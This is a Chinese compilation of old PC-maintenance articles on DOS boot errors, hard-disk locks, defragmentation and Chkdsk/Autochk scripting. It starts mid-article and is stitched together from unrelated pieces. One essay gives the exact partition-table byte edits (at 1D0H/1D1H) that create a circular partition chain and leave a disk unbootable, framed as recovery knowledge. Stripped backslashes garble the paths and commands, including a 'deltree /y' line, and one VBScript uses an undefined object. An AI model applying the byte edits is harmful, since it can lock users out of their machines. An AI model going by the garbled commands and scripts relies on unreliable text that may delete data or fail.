    找到激活分区后，主引导程序还将判断余下三个表项的“分区引导标志”字节(首字节)是否均为0，即确认是否只有唯一的激活分区，如果有一个不为0(正常值只可能为00H和80H)，系统就报错并死机。
    9、Bad or missing Command Interpreter
    Enter cortect name or Command Interpreter(命令处理程序错误，请输入正确的文件名)
    系统在根目录和指定的目录下找不到命令处理程序，要求用户输入正确的路径和文件名，你可以在提示符下进行输入，比如：C:\DOS\COMMAND.COM。
    10、Invalid Media Type Reading Gnive X
    Abort Retry，Fail(读X驱动器介质类型无效)
    这条信息是针对DOS BOOT区中无效的BPB表而提示的。BPB表是DOS读写硬盘所用的逻辑地址，换算成物理地址的桥梁，BPB表损坏，会使DOS对磁盘的操作无从谈起。
    硬盘的引导型软故障，可以由框图所示的顺序进行逐项检查：主引导扇区中的主引导程序—分区BOOT区中的引导程序—DOS系统隐含文件—CONFIG AUTOEXEC。
    当硬盘读写没有问题(用软盘启动后可以正常读写)，只是不能引导系统，故障点一定在上框所示的四个地方，检查的顺序是主引导程序、分区引导程序、DOS系统隐含文件、CON－FIG.SYS和AUTOEXEC.BAT。对于主引导扇区中的主引导程序，可用FDISK\MBR强行写入一个正确的备份。对于分区BOOT区中的引导程序和系统隐含文件，可用SYS C:传送系统，把错误数据覆盖掉(前提是BPB表完好)。而对于硬盘读写失败的情况，可能的故障点只有两个：分区表和BPB表。如果用软盘启动后，能够出现C盘提示符，可以肯定C盘的分区表存在并且基本完好；如果C盘读写正常，BPB表可以肯定是好的。读者可根据前面介绍的方法或其他合适的工具进行恢复。
    11、17XX Hard Disk Ertor
    HDC controller fail(硬盘控制器控制失败)
    这类故障是硬件故障。POST程序向控制器发出复位命令后，在规定的时间内没有得到控制器的中断响应，可能是控制器损坏或电缆没接好。控制器失败与硬盘参数设置是否正确


解开硬盘逻辑死锁的一种有效方法

《一键清理系统垃圾》

解开硬盘逻辑死锁的一种有效方法

    一、序言

   不知道你是否曾碰到过从软盘和硬盘都启动不了计算机的情形？一般计算机的硬盘分区表被病毒感染后，若不能启动机子，通常从软盘可以启动。但在严重的情形下，不但从硬盘不能启动机子，就是从软盘也不能启动。有的恶毒的病毒就能使硬盘被死锁。笔者一次在自己机子上玩弄硬盘锁时，就被锁住过一次。结果在硬盘下选择DOS或WIN95模式启动机子都死机，在软盘下用DOS启动也死机；在COMS中将硬盘类型选择None，虽然可以从软盘启动，但启动后没有硬盘，使用软盘上的FDISK命令，想重新分区或格式化都没门。弄得我一筹莫展。

    本来，硬盘被锁住时，可以采用3.0以下的DOS版本启动机子，机子启动后虽然也不认硬盘，但其不认的原因在于其管理不了现在的大硬盘，因此可以用Debug修改硬盘分区表，修改后可以启动。但在已进入WINDOWS的年代，3.0以下的DOS实难找到，即使找到，你的机子上恐怕也因没有5寸软驱而不能使用。因此，最好的办法是编制一个程序来解决这个问题。笔者通过尝试和思考，找到一种比较实用的方法，可以轻松解开死锁的硬盘，当然也把自己的硬盘解开了。下面，我将这种方法介绍出来。

    二·硬盘锁住原理

    硬盘锁住通常是对硬盘的分区表做手脚，因此首先应该了解硬盘的分区表。硬盘分区表位于0柱面0磁头1扇区，这个扇区的前面200多个字节是主引导程序，后面从01BEH开始的64个字节是分区表。分区表共64字节，分为4栏，每栏16字节，用来描述一个分区。如果是用DOS的FDISK程序分区后，最多只用两栏，第一栏描述基本的DOS分区， 二栏描述扩展的DOS分区。 分区表一栏的结构与各字节的含义如下：

    00H—标志活动字节，活动DOS分区为80H，其它为00H。
    01H—本分区逻辑0扇区所在的磁头号。
    02H—逻辑0扇区所在柱面中的扇区号。
    03H—逻辑0扇区所在的柱面号。
    04H—分区类型标志。
    05H—本分区最后一个扇区的磁头号。
    06H—最后一个扇区的扇区号。
    07H—最后一个柱面的柱面号。
    08H—硬盘上在本分区之前的扇区总数，用双字表示。
    0CH—本分区的扇区总数，从逻辑0扇区计数，不含隐藏扇区，用双字表示。

    在上面的介绍中给出的柱面号与扇区号虽然各占一个字节，但实际上扇区号用6位表示，柱面号用10位表示，扇区号所在字节的最高两位实际上是柱面号的最高两位。 　　分区表的最后两个字节是分区表的有效标志，如果将其改变，将不能从硬盘启动，这是一种简单的锁住硬盘的方法。解决的办法是从软盘启动，启动后硬盘仍然可以使用。用Debug或Noratn中的Diskedit软件将硬盘该分区表中的标志恢复，则从硬盘启动也没有问题了。锁住硬盘的另一种方法是对分区参数做手脚，如果将分区参数全部变为0，则启动时由于找不到分区参数，从硬盘是没法启动，从软盘启动后也不认硬盘，如果你敲入盘符C并回车，将出现提示Invalid driver specification。

    但所幸的是，毕竟可以启动机子，不认硬盘没关系，在A盘上用DOS的Debug仍然可以读出硬盘0柱面0磁头1扇区的内容，修改后再写入0柱面0磁头1扇区，重新启动机子又没问题了。如果将分区表参数随意改为其它参数，则有可能不能用可以安装DOS的DOS系统盘启动，按F3退出后将出现内存分配错误，不能装载DOS的命令解释器COMMAND的提示，系统就死机了，笔者就曾碰见过这种情形。但用一张格式化成系统盘的软盘则可以顺利启动，只要有Debug，你仍然可以将分区表参数修改回去。

    可怕的事情是，如果你不幸将分区表参数改成一个循环链，即C盘的下一个分区指向D驱，D驱的下一个分区又指向C区，这样循环下去，DOS启动或WIN95启动时由于无休止的读取逻辑驱动器，就只有死机的份了。这是只要有硬盘存在，不管你用软盘还是硬盘都没法启动机子了，由于不能启动是由于硬盘造成的，即使你将硬盘下到其它计算机上，也没法使用，这样硬盘就彻底被锁死了，笔者所遭遇就是此情形。不信，你只需将硬盘0柱面0磁头1扇区的1D0H处改为1（如果你的D驱开始柱面号不够大，此处本来就为1），将1D1H处改为0，表示D盘的开始柱面号跟C盘一样，看看你的计算机还能不能启动，不过你在没有充分的准备前绝不要试。

    一个完整的硬盘锁程序，不过是重新改写0柱面0磁头1扇区的引导程序，并将分区表破坏或故意制造一个循环分区表，而将真正的硬盘分区表参数和引导程序放在其它隐藏扇区并保护起来，如果启动时口令不对，则不能启动机子，口令对了则顺利启动。这种硬盘锁程序，情形好的还可以用软盘启动；情形严重的就是连软盘也不能启动，硬盘真被锁住


解析磁盘原碎片整理

《一键清理系统垃圾》

解析磁盘原碎片整理

磁盘碎片原理分析
一、什么是磁盘碎片?
    其实磁盘碎片应该称为文件碎片，是因为文件被分散保存到整个磁盘的不同地方，而不是连续地保存在磁盘连续的簇中形成的。
当应用程序所需的物理内存不足时，一般操作系统会在硬盘中产生临时交换文件，用该文件所占用的硬盘空间虚拟成内存。虚拟内存管理程 序会对硬盘频繁读写，产生大量的碎片，这是产生硬盘碎片的主要原因。
    其他如IE浏览器浏览信息时生成的临时文件或临时文件目录的设置也会造成系统中形成大量的碎片。文件碎片一般不会在系统中引起问 题，但文件碎片过多会使系统在读文件的时候来回寻找，引起系统性能下降，严重的还要缩短硬盘寿命。另外，过多的磁盘碎片还有可能导致 存储文件的丢失
二、磁盘碎片是怎么产生的？
    在磁盘分区中，文件会被分散保存到磁盘的不同地方，而不是连续地保存在磁盘连续的簇中。又因为在文件操作过程中，Windows系统 可能会调用虚拟内存来同步管理程序，这样就会导致各个程序对硬盘频繁读写，从而产生磁盘碎片。
三、磁盘读写操作的原理
    知道了磁盘碎片的产生原因之后，我们还有必要了解一下程序运行时磁盘的读写动作。一般运行一个程序时，磁盘驱动器的磁头所做的 工作是先搜索该程序运行必需的文件，然后读取数据，最后做读后处理——将数据传送至磁盘高速缓存(Cache)和内存中。搜索时间在硬盘性能 指标中被称为平均寻道时间（Average seek time），单位为毫秒（ms），目前主流硬盘的平均寻道时间小于9.5ms。如果能将应用程序的相关文件放在磁盘的连续空间内，磁头搜 索的时间将会减少很多。读取时也是如此，磁盘读取位于磁头下方扇区的数据所需时间仅为将磁头移到另一地点再读取相同数据所需时间的五 分之一。读盘时，系统先检查数据是否在高速缓存中，如果有则直接读取；如果没有则访问磁盘，也就是读盘。当需要多次读取同一份数据时 ，Cache的作用很大，但对于第一次读取某个文件，Cache就无能为力了。于是搜索时间和读取时间在很大程度上影响着程序执行的效率。

    为何要整理磁盘 Windows系统并不能自动将每个文件按照最大程度减少磁头搜索时间的原则放到磁盘上最合适的位置。于是Microsoft在 Windows中加入了“Disk Defragment”（磁盘碎片整理程序），并提供了“TaskMonitor”(任务监视器）来跟踪程序启动过程中的磁盘活动，以利于“Disk Defragment”能够更有效地工作。“TaskMonitor”是随Windows启动而自动运行的(当然要在“启动”中选中“TaskMonitor”)。当加载某个应 用程序时，它通过监视磁盘的访问动作来了解该程序启动时搜索和调用的文件，对所需文件进行定位，并将监视结果储存在“C： WindowsApplog”隐藏目录中。这个目录中的大多数文件以“.lgx”为扩展名，其中“lg”代表记录文件（Log File），“x”表示盘符，如D盘程序就以“.lgd”为扩展名；记录文件的文件名为TaskMonitor所监视的应用程序的文件名，如E盘上的 WinZip程序记为“Winzip32.lge”。用户进行磁盘碎片整理时，该程序会根据Applog目录中的信息把应用程序的相关文件移动到磁盘上的连续 空间内。

    TaskMonitor仅在程序加载过程中对文件信息进行搜索，并且根据程序的加载频率调整优化的顺序，也就是说使用次数最多的软件可获得 最多的关照。Applog目录中的APPLOG.ind文件就记录了应用程序运行的次数。用户需要将常用软件多次启动，接受TaskMonitor的监视和记录， 再使用Disk Defragment进行整理，才能真正实现程序启动速度的提高。但如果用户中途改变了常用软件，比如以前常用WinZip，现在改用ZipMagic，那 么在相当长的时间内Disk Defragment还是先把与WinZip相关的文件移到连续的空间内，而不是ZipMagic，除非ZipMagic的加载次数超过WinZip。要解决这个问题，用 户可将“Winzip32.lgx”文件删除，记录文件不存在了，Disk Defragment也就不会去优化它了。
四、该不该定期整理硬盘？
    实际上，定期整理硬盘应该是毫无疑问的。如果说硬盘碎片整理真的会损害硬盘的话，那也将是在对硬盘进行近乎天文数字般次数的整 理之后。
    硬盘使用的时间长了，文件的存放位置就会变得支离破碎——文件内容将会散布在硬盘的不同位置上。这些“碎片文件”的存在会降低 硬盘的工作效率，还会增加数据丢失和数据损坏的可能性。碎片整理程序把这些碎片收集在一起，并把它们作为一个连续的整体存放在硬盘上 。Windows自带有这样的程序：磁盘碎片整理程序（DiskDefragmenter），但在工具软件NortonUtilities和Nuts&Bolts中有更好的此类程 序。
    然而，碎片整理对硬盘里的运转部件来说的确是一项不小的工作。如果硬盘已经到了它生命的最后阶段，碎片整理的确有可能是一种自 杀行为。但在这种情况下，即使您不进行碎片整理，硬盘也会很快崩溃的。
    实际上在大多数情况下，定期的硬盘碎片整理减少了硬盘的磨损。不管怎么说，让硬盘的磁头从1处读取文件总比从8处读取要容易得多 。因此，一个每两周或四周整理一次的硬盘的寿命应当比一个永远不整理的硬盘长。
五、整理前的准备工作

    我们在整理硬盘前一般都要对它清理垃圾信息，检查有无错误，最后才能谈到碎片的整理和优化。因此，我们在整理硬盘前，应该首先 做好这些工作：
    1、应该把硬盘中的垃圾文件和垃圾信息清理干净。系统工作一段时间后，垃圾文件就会非常之多，有程序安装时产生的临时文件、上 网时留下的缓冲文件、删除软件时剩下的DLL文件或强行关机时产生的错误文件等，建议“菜鸟”朋友还是使用微软的“磁盘清理程序”代劳， “老鸟”当然可以使用一些功能更强的软件或手工清理。
    2、检查并修复硬盘中的错误。首选的仍然是微软的“磁盘扫描程序”，虽然它的速度实在不怎么样，但只要你有足够的耐心，经过这 个程序对磁盘完整而详细的扫描后，相信系统中的绝大多数错误已经被修复了。当然你也可以尝试一下其他工具，如扁鹊神医“Norton WinDoctor”，它的速度可比Windows中的“磁盘扫描工具”快多了。
从九大方面窥视磁盘碎片整理

蓝天·yesky　2004-11-03
关键字查询： windows 　 磁盘 　 碎片 　 系统
编者按：
其实磁盘碎片应该称为文件碎片，是因为文件被分散保存到整个磁盘的不同地方……

六、整理方法及注意

    在Windows里，用户可以从“开始”菜单中选择“程序/附件/系统工具/磁盘碎片整理程序”，弹出选择驱动器窗口，选择要整理的分区 ，然后点击[确定]即可开始整理，但此方法碎片整理过程非常耗时，一般2GB左右的分区需要1个小时以上，所以建议读者:
    1、整理磁盘碎片的时候，要关闭其他所有的应用程序，包括屏幕保护程序，最好将虚拟内存的大小设置为固定值。不要对磁盘进行读 写操作，一旦Disk Defragment发现磁盘的文件有改变，它将重新开始整理。
    2、整理磁盘碎片的频率要控制合适，过于频繁的整理也会缩短磁盘的寿命。一般经常读写的磁盘分区一周整理一次。

七、磁盘扫描程序的命令参数

    命令参数在 DOS时代可以说是一项基本的技能，很多程序都要靠命令参数来启动，而到了图形化界面时代，已很难再见到其踪迹，但它却 实实在在地存在着，而且发挥着不小的作用。如很多 Windows游戏的设置程序就是用 /Setup 参数来实现的。通常我们不会太留意某些程序的命令参数，但他们往往包含着某些隐秘的功能，如果运 用适当对你很有帮助。
    Windows 中的磁盘扫描程序就包含着许多命令参数，你可以在MS_DOS方式下或在“运行”对话框中实现，如果需要经常用命令参数，还 可以建立一个快捷方式。
    /SILENT 启动磁盘扫描程序不允许作任何选项设置和高级设置。
    /A　　　检查所有的本地硬盘
    /N　　　自动启动和退出磁盘扫描程序
    /P　　　防止磁盘扫描程序修复所发现的错误
    X:　　　X 表示指定要检查的驱动器号（不需要 / 的命令参数）
    举例：
    1）检查驱动器 E 并自动启动和退出磁盘扫描程序
    SCANDSKW E: /N
    2）检查所有的硬盘并防止磁盘扫描程序修复发现的任何错误
    SCANDSKW /A /P
八、运行过其他文件整理程序怎么办
    当运行了其他磁盘文件整理程序（如WinAlign）后，它可能扰乱了TaskMon记录的数据，若此时直接进行碎片整理，可能会得不偿失， 达不到优化性能的目的。解决的办法是在进行碎片整理之前，多次运行Windows和自己最常用的程序，这样可以让TaskMon重新收集到正确的统 计数据，指导进行磁盘优化。
    最后，当启动Windows98的磁盘碎片整理程序时，可能会诧异界面中的Intel标志。为什么处理器的生产厂商会参与编写这个优化磁盘的 软件呢？这是因为硬盘寻道时间的缓慢会导致系统整体性能的下降，这样会有损CPU超级计算能力的形象，让人误以为是CPU性能的低下。 Microsoft的一个测试表明，在奔腾233的机器上启动Windows仅仅比奔腾150快3％，也就是说，快速的CPU并不能克服磁盘延迟的缺点。于是， 在共同利益的驱动下，Intel和Microsoft联合开发了Windows98的磁盘碎片整理程序，用来消除硬盘寻道缓慢的瓶颈。
九、如何快速地整理磁盘碎片
    每次需要整理磁盘碎片时都需要选择“开始”*“程序”*“附件”*“系统工具”*“磁盘碎片整理程序”，然后再指定驱动器，很麻烦 。能否有简单的方法完成这一系列操作？
    在Windows资源管理器中，选择“查看”*“文件夹选项”(或“查看”*“选项”)，选择“文件类型”选项卡，并在“已注册的文件类 型”列表中选择“驱动器”。单击“编辑”按钮，打开“编辑文件类型”对话框，选择“新建”，在“操作”栏中，键入“快速整理磁盘碎片 ”。在“用于执行操作的应用程序”栏中键入“C:Windowsdefrag.exe "%1" oprompt”。
    单击“确定”，然后“关闭”，回到“文件类型”选项卡，然后单击“关闭”。现在，打开“我的电脑”，右键单击想要整理磁盘碎片 的驱动器，在弹出的快捷菜单中选择“快速整理磁盘碎片”即可。

--------------------------------------------------------------------------------
作者: mfq　　时间: 2004-12-23 08:26　　 标题: 解析磁盘原碎片整理

磁盘碎片整理技巧
磁盘碎片整理程序整理硬盘是提高程序执行速度的一种好方法。但硬盘碎片整理过程非常费时，整理之后，上网、玩游戏，不到一两个星期，程序执行速度又会明显下降，硬盘碎片又大量增多了。这时，你一定会再用磁盘碎片整理程序重新整理磁盘。追求极速是好事，但如此频繁地做下去，费时麻烦不用说，久而久之，你的硬盘也会缩短使用寿命。
    有没有一种好的方法，既不用频繁地整理硬盘碎片，又不至于过分地降低程序执行速度，答案是肯定的。现在就介绍给大家。
    1、虚拟内存管理程序
    虚拟内存的机制是，当应用程序所需的物理内存不足时，默认情况下Win9X会在硬盘C：WINDOWS系统目录中产生一个文件名为WIN386.SWP的临时交换文件，用该文件所占用的硬盘空间虚拟成内存（即使你什么也不做，只是打开电脑，该文件也一样存在）。显然，虚拟内存管理程序会对硬盘频繁读写，产生大量的碎片，这是产生硬盘碎片的主要原因。
    一般用户的硬盘都有多个分区，也习惯将Win9X系统和应用程序分别安装在C:WINDOWS和C: Program Files目录下。为避免临时交换文件在C区频繁读写产生的大量的碎片，我们可以将临时交换文件指定在其他分区（如D区）生成，具体操作为：打开“控制面板系统”，在弹出的对话框中单击“性能虚拟内存”，选择“用户自己指定虚拟内存设置”选项，再从“硬盘”选项中选择D：（注意：D区可用空间不可小于100MB），最后单击“确定”按钮。重新启动系统，你会发现WIN386.SWP临时交换文件已经生成在D区的根目录了，也就是说临时交换文件以后只会在D区产生大量的碎片。从而加快系统的启动速度。
    2．IE浏览器
    默认情况下，IE浏览器将C：WINDOWSTemporary Internet Files目录作为临时文件储存目录。若经常上网冲浪，IE浏览器会在该目录下生成大量的临时文件，同样会对硬盘频繁读写，产生大量的碎片。 　　为避免这些临时文件在C区频繁读写产生的大量的碎片，我们可以将该目录指定到其他分区（如D区）。具体操作为：先在D区建立一个目录（如IE目录），再选择“控制面板Internet选项”，在弹出的对话框中单击“设置移动文件夹”，最后选择D：IE目录即可。经过这样设置，IE浏览器生成的大量临时文件只会在D区上产生碎片。这样，你只须每个月用磁盘碎片整理程序整理完D区的碎片，而C区中的程序经长时间使用，执行速度也不会明显降低了。
3、用Ghost整理磁盘碎片
    记得我第一次用Windows中自带的碎片整理软件整理一个4GB的分区时，硬盘足足工作了7个多小时，从此以后我就再也没用它来整理碎片了。其实，用Ghost也可以整理硬盘，大家知道，用Ghost做磁盘映像时，Ghost会把硬盘分区中的每一个数据都完整地读出，然后把它写入一个GHO文件中，对于分区的空白部分，软件会自动跳过。然后当我们恢复GHO映像文件时，软件会把文件中的所有内容连续地写入分区中，于是所有的数据便都自动写在分区的头部，我们便得到了完整的未使用空间，原先的碎片文件也就自然消失。
    用Ghost整理碎片的具体方法是：先用Scandisk扫描并修复分区上的所有错误码，再用Ghost给要整理的分区做一个GHO映像文件，文件的大小视分区的使用情况而定，然后再将GHO文件还原到原分区即可，这些操作最好在纯DOS模式下运行，在还原映像时一定要选对分区，否则会造成数据的丢失。根据我的使用经验，通过这个方法整理4GB的硬盘，所用时间大概在30分钟，比Vopt2000的所花的时间要长一点，但是效果要好得多，不过使用Ghost软件有一定的危险性，建议大家小心使用。
    4．Windows临时文件目录的设置
    许多的工具软件和应用软件在默认情况下的安装和运行时都会在C:WINDOWSTEMP目录下生成大量的临时文件，这些临时文件的频繁读写也会产生碎片。
    解决的办法是：通过设置修改系统的环境变量，将系统临时文件目录指定为D区的TEMP目录。具体操作为：先在D区根目录建立目录TEMP，再编辑AUTOEXEC.BAT文件内容，在其中开始处输入SET TEMP=D:TEMP和SET TMP=D:TEMP两行，结尾处输入deltree ／y d: emp 和md d: emp 两行（目的是删除有的程序执行后残留的临时文件）。之后，重新启动你的电脑，系统的临时文件目录指定到了D:TEMP，绝大多数程序安装和运行时生成的临时文件只在D区产生碎片。
    总结：你可以把Win9X、常用的工具软件和应用软件等安装在C区，再把虚拟内存管理的临时交换文件、IE浏览器的临时文件目录和系统的临时文件目录分别指定到D区（尽量不要安装其他的程序到D区）。这样，你只须每个月用磁盘碎片整理程序整理完D区的碎片，而C区中的程序经长时间使用，执行速度也不会明显降低了。
Windows2000/XP系统磁盘扫描已经升级到卷的高度，不再是简单的SCANDISK。卷被定义为包含文件系统的分区，它可以用驱动器号/卷安装点或全局唯一标识符(GUID) 来寻址。我们可以在系统运行时强制进行卷 检查，或安排在重新启动时进行卷检查，如果使用脚本还可以更准确地控制何时在卷上进行文件系统检查。要掌握磁盘扫描特点，需要灵活使用下面相互关联的3个工具：Chkdsk.exe、 Chkntfs.exe以及Autochk.exe。让我们先来简单认识一下他们。
    chkdsk.exe
    检查硬盘驱动器的完整性，检查磁盘和修复文件系统就靠它了。chkdsk.exe 同时可以恢复文件系统错误， 并可以试图恢复坏扇区，如果无法修复就标记坏扇区，以避免文件被误写入导致丢失。
    Chkntfs.exe
    显示文件系统类型、文件系统“脏字位”状态，以及手工安排启动时运行 Chkdsk进行卷检查，或取消所 有安排的检查项目等。
    Autochk.exe
    查找每个卷上的“脏字位”，以及 Chkdsk /F 和 Chkntfs /X 或 /C 所作的注册表设置，决定是检查卷， 还是跳过检查。它可以区分是手工安排的卷检查，还是由于文件系统发现卷处于“脏”状态而自动进行卷检查 ，并会把相应的消息写入应用程序事件日志。该命令不能在 WIN32 模式下运行。
  一、在系统运行时强制进行卷检查
    安装 Windows2000/XP 后，“系统工具”文件夹中不显示磁盘扫描命令。不是没有了，具体这样做：
    双击我的电脑，然后右键单击要检查的硬盘驱动器。
    单击属性，然后单击工具。
    在查错下，单击开始检查。
    这样就可以在 Windows 中检查硬盘驱动器的完整性了。
    或者到命令提示符下执行CHKDSK /X 命令。
    /X 是一个新的命令参数，它运行 Chkdsk /F，并强制执行卷卸除，关闭非系统卷上打开的文件句柄，以 便立即对卷进行检查。这样，要运行 Chkdsk 并修复卷，就不必重新启动。
二、安排在下一次重新启动时进行卷检查
    Autochk 通过有2个因素控制是否进行卷检查或跳过检查。一个是当文件系统检测到问题时，系统自己设置 的“脏字位”，设置脏字位的的目的就是为了在下次启动时对卷进行检查。 另一个是人工安排，既用 Chkdsk /F 和 Chkntfs /X 或 /C 所作的注册表设置。通过 Chkntfs volume：命令可以查询文件系统类型、文件系统 “字位”状态，以及是否已手工安排启动时运行 Chkdsk 进行卷检查等信息。
    Autochk 在确定启动时检查哪些卷所使用的注册表项为：
    Hkey_local_machineSystemCurrentControlSetControlSession ManagerBootExecute:REG_MULTI_SZ: autocheck autochk *
    这是 Autochk 的默认设置，也是使用 Chkntfs /d 安排启动时检查所有卷所得到的结果。
    下面通过设置或重设注册表，来控制 Autochk。
    命令　　　　　　　　　　　　 BootExecute键植
    Chkdsk C: /F　　　　　　　　 autochk /p ??C:
    Chkdsk C:mountpoint /F　　 Autocheck autochk /p ??VOLUME{GUID}
    Chkntfs D: E: /X　　　　　　 Autocheck autochk /k /k:E *
    Chkntfs G: /C　　　　　　　　Autocheck autochk /m ??G:
    注解：
    /P ??Volume:　　　　　　 安排 Chkdsk 无条件地运行来检查卷。
    /p ??VOLUME{GUID}　　　　 安排 Chkdsk 无条件地运行来检查卷安装点。
    /k:Volume *　　　　　　　　 不对卷执行 Chkdsk 检查。
    /m ??Volume:　　　　　　 让 Autochk 仅查找卷上的脏字位，如果已设置脏字位，则运行 Chkdsk。
    另外，Chkntfs /T 在默认情况下，开机时扫描每个分区前会等待10秒钟，用户此时可以按任意键 跳过扫描继续启动。该参数就是用来设置等待时间的，即将Autochk 超时值改为指定时间（秒数），如果没有指定时间，则显示当前设置。系统在注册表项 key_local_machineSystemCurrentControlSetControlSessionManager下增加一个键：AutoChkTimeOut，类型为 REG_DWORD，数值为当前设置的超时值。
三、用脚本从程序中安排卷的修复日程
    由于可以通过设置或重设注册表，来控制 Autochk，因此可使用脚本，从程序中安排卷的修复日程。
在记事本程序中，使用.VBS文件扩展名存储相应文件（例如：MyScript.vbs）。同时，建议您在一个公共文 件夹（例如：C:Scripts）中保存这些脚本。打开命令行窗口。如果需要，使用cd命令切换到用以存储脚本的 文件夹中。在命令行窗口中，输入csript 命令并在其后跟随脚本名称。
    例如：
    cscript myscript.vbs
    1、修改 AutoChk 的 Timeout 值
    为 Autochk.exe 设定自动延迟时间为 30 秒。适用于 Windows XP 或 Windows 2003 Server。
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\" & strComputer & " ootcimv2")
    Set colAutoChkSettings = objWMIService.ExecQuery _
    ("Select * from Win32_AutochkSetting")
    For Each objAutoChkSetting in colAutoChkSettings
    objAutoChkSetting.UserInputDelay = 30
    objAutoChkSetting.Put_
    Next
    2、防止 AutoChk 在开机时自动运行
    即使电脑下次开机时，就算 C盘的 "字位" 已被设定, Autochk 也不会对C磁盘执行检查。适用于 Windows XP 或 Windows 2003 Server。
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\" & strComputer & " ootcimv2")
    Set objDisk = objWMIService.Get("Win32_LogicalDisk")
    errReturn = objDisk.ExcludeFromAutoChk(Array("C:"))
    Wscript.Echo errReturn
    3、执行 ChkDsk
    对电脑的D盘执行ChkDks.exe。适用于 Windows XP 或 Windows 2003 Server。
    Const FIX_ERRORS = True
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\" & strComputer & " ootcimv2")
    Set objDisk = objService.Get("Win32_LogicalDisk.DeviceID=';D:';")
    errReturn = objDisk.ChkDsk(FIX_ERRORS)
    Wscript.Echo errReturn
    4、安排在电脑下一次重新启动时，对 C 盘执行 Autochk.exe。适用于 Windows XP 或
    Windows 2003 Server 。
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\" & strComputer & " ootcimv2")
    Set objDisk = objWMIService.Get("Win32_LogicalDisk")
    errReturn = objDisk.ScheduleAutoChk(Array("C:"))
    Wscript.Echo errReturn
全面剖析磁盘扫描功能

陈宏力·Yesky　2004-11-03
关键字查询： windows 　 磁盘 　 碎片 　 系统
编者按：
Windows2000/XP系统磁盘扫描已经升级到卷的高度，不再是简单的SCANDISK。卷被定义为包含文件系统的分区，它可以用驱动器号/卷安装点或全局唯一标识符(GUID) 来寻址……

四、几点重要说明
    1、开机时按下某个键跳过 Autochk
    如果安排 Chkdsk 在启动时运行以检查某个卷，但实际启动时决定按下某个键跳过Autochk，则 Autochk 将 不会检查该卷，并删除相应的注册表项，在以后，Autochk也不会检查该卷。
    2、Autochk应用程序事件日志
    当 Autochk 在启动时运行检查某个卷时，它会输出记录到一个称为 Bootex.log 的文件中，该文件放在被 检查卷的根目录下。随后，Winlogon 服务将每个 Bootex.log文件的内容移到“应用程序事件日志”中。每个 被检查卷的事件日志消息按以下方式：
    记录：
    事件 ID：1001
    源：Winlogon
    说明：它包括文件系统类型、驱动器号或 GUID 及卷名称或序列号，可以帮助确定Chkdsk 检查的是哪个卷。此外还包括，Chkdsk 是因为用户的安排而运行的呢，还是因为已设置了脏字位而运行的等信息。
    3、以只读方式运行的 Chkdsk 未检测到 NTFS 卷上的损坏
    当只读模式对一个使用 NTFS 文件系统的磁盘卷运行 Chkdsk 时，Chkdsk 可能检测不到磁盘结构的损坏。原因是如果主文件表中的 &#36;logfile 数据区被破坏，则可能会出现这一现象。解决方案是若要解决这一问题， 请在运行 Chkdsk 时使用 /f 选项，以便重新初始化 &#36;logfile 数据区并修复损坏问题。
    在命令提示符下键入下面的命令，然后按 ENTER 键
    chkdsk volume_label :/v /f
    其中， volume_label是您要对其运行 Chkdsk 的磁盘卷标。
    4、在Microsoft Windows 2000 Server SP3上，在还原或复制大量的数据后 Chkdsk 找到不正确的安全 ID在您还原或复制大量的数据和与这些数据关联的 NTFS 文件系统安全信息时，Chkdsk.exe 可能会报告此分 区有错误。即使您把数据还原或复制到一个已知无错误的分区中时也会发生此问题。Chkdsk 可能会报告类似如 下内容的错误消息： 　　CHKDSK is verifying security descriptors (stage 3 of 3)...
    Repairing the security file record segment.
    Deleting an index entry with Id 8447 from index &#36;SII of file 9.
    Deleting an index entry with Id 31126 from index &#36;SII of file 9.
    Deleting an index entry with Id 50636 from index &#36;SII of file 9.
    Deleting an index entry with Id 31126 from index &#36;SDH of file 9.
    Deleting an index entry with Id 50636 from index &#36;SDH of file 9.
    Deleting an index entry with Id 8447 from index &#36;SDH of file 9.
    Replacing invalid security id with default security id for file 1461234.
    Security descriptor verification completed.
    Windows found problems with the file system.
    注意，报告的错误数和安全 ID 可能因具体情况而异。索引项 ID 和文件编号也可能会有所变化。
    如果您接着对此分区运行 chkdsk /f 命令，并对应用的权限执行审核，则会发现某些文件和文件夹可能已 丢失了用户定义的权限。这些权限可能已被默认权限代替，而默认权限只向 Local System 和 Administrators 帐户授予访问权。
    无论您使用何种程序还原或复制数据都会发生此问题。报告发生此问题的情形有：
    在使用 Ntbackup.exe 工具还原数据（带安全信息）之后，以及在使用 Xcopy.exe 带/o和/x参数复制数据（带安全信息）之后。
    原因在设计上，NTFS 文件系统要求以块的形式编写安全描述符，而且在每一个安全描述符块的末尾至少要留下 20 字节。这是为安全描述符标头留下的空间。然而，在某些情况下，NTFS 代码的错误计算会导致安全描述符 几乎写到了块的末尾，以致留下不足 20 字节的可用空间。Chkdsk.exe 于是就会删除这些安全描述符并使用默 认安全描述符代替它们，以确保在块的最后留下最少 20 字节的可用空间。这将导致某些文件和文件夹丢失用 户自定义的安全性。
    通过下载SP4解决此问题。
    5、McAfee VirusScan 6.1 在执行磁盘扫描操作期间将计算机挂起
    当运行磁盘扫描程序扫描硬盘时，计算机可能会停止响应（挂起）。如果计算机上安装了 Network Associates McAfee VirusScan 6.1，则可能会出现此问题。
    要解决此问题，可以使用下面的两种方法之一：
    方法1
    修改 VirusScan 扫描设置：
    启动 VirusScan（依次单击开始、所有程序、McAfee，然后单击 VirusScan）。
    在 VirusScan 窗口的左下角，单击“选择任务”。
    单击 Change my VirusScan settings（更改我的 VirusScan 设置）。
    单击 Configure VShield background scanning（配置 VShield 背景扫描）。
    单击以清除 Enable Internet Filter（启用 Internet 过滤）复选框。
    单击以清除 Enable Download and E-mail scanning（启用下载和电子邮件扫描）复选框。
    单击 Apply Settings（应用设置）。
    退出 VirusScan。
    方法2
    与 Network Associates 联系，以获取能够解决此问题的 McAfee VirusScan 版本。
    6、关于共享群集磁盘
    对于运行群集服务的服务器群集节点所共享的卷，不允许在启动时运行Autochk.exe 进行检查。当这些卷 被联机，或从一个节点移到另一节点时，群集服务会检查该卷是否处于“脏”状态。如果是，那么在联机前， 就要使用 Chkdsk 来检查该卷。但并去不检查 BootExecute 注册表值，所以也不会去考虑那些值。

